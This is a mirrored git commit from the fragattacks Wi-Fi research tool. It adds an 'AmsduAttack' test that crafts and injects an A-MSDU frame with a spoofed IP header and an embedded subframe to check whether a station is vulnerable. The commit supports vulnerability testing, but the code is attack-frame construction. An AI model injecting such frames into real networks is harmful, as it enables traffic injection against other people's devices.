Amazing-Mirror/fragattacks
1
0
Fork 0
mirror of https://github.com/vanhoefm/fragattacks.git synced 2025-02-26 13:49:35 -05:00
Code Issues Projects Releases Wiki Activity

fragattack: test A-MSDU attack and Linux variant

Browse Source
This commit is contained in:
Mathy 2020-05-27 01:43:52 -04:00 committed by Mathy Vanhoef
parent 3e76decf16
commit 0dcaf9a36c
3 changed files with 44 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
research/fragattack.py
View File

@ -8,7 +8,9 @@ from wpaspy import Ctrl
from scapy.contrib.wpa_eapol import WPA_key from scapy.contrib.wpa_eapol import WPA_key
from scapy.arch.common import get_if_raw_hwaddr from scapy.arch.common import get_if_raw_hwaddr
# FIXME: Import here to avoid loops
from tests_qca import * from tests_qca import *
from tests_attacks import *
# ----------------------------------- Utility Commands ----------------------------------- # ----------------------------------- Utility Commands -----------------------------------
@ -1491,6 +1493,9 @@ def prepare_tests(opt):
elif opt.testname == "qca-rekey": elif opt.testname == "qca-rekey":
test = QcaDriverRekey() test = QcaDriverRekey()
elif opt.testname == "amsdu-attack":
test = AmsduAttack(REQ_ICMP, stractions == "linux")
# No valid test ID/name was given # No valid test ID/name was given
else: return None else: return None

2
research/libwifi

@ -1 +1 @@
Subproject commit a0bfa1be06d2437f92b75fe08266adae0a145e80 Subproject commit 69c61780992dc66313e194f97958380ffc110643

38
research/tests_attacks.py Normal file
View File

@ -0,0 +1,38 @@
from fragattack import *
class AmsduAttack(Test):
"""
Inject a frame identical to the one the station would receive when performing
the A-MSDU attack by injecting an IP packet with a specific identification field.
"""
def __init__(self, ptype, linux=False):
super().__init__([Action(Action.Connected, Action.Inject, enc=True)])
self.ptype = ptype
self.linux = linux
def prepare(self, station):
log(STATUS, "Generating A-MSDU attack test frame", color="green")
# Generate the header and payload
header, request, self.check_fn = generate_request(station, self.ptype)
# This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this?
if header.FCfield & 1 != 0:
src = station.mac
dst = station.get_peermac()
else:
dst = station.peermac
src = station.bss
# Put the request inside an IP packet
if not self.linux:
p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP()
else:
p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/Raw(b"A" * 768)
p = p/create_msdu_subframe(src, dst, request, last=True)
p[Dot11QoS].Reserved = 1
# Schedule transmission of frame
self.actions[0].frame = p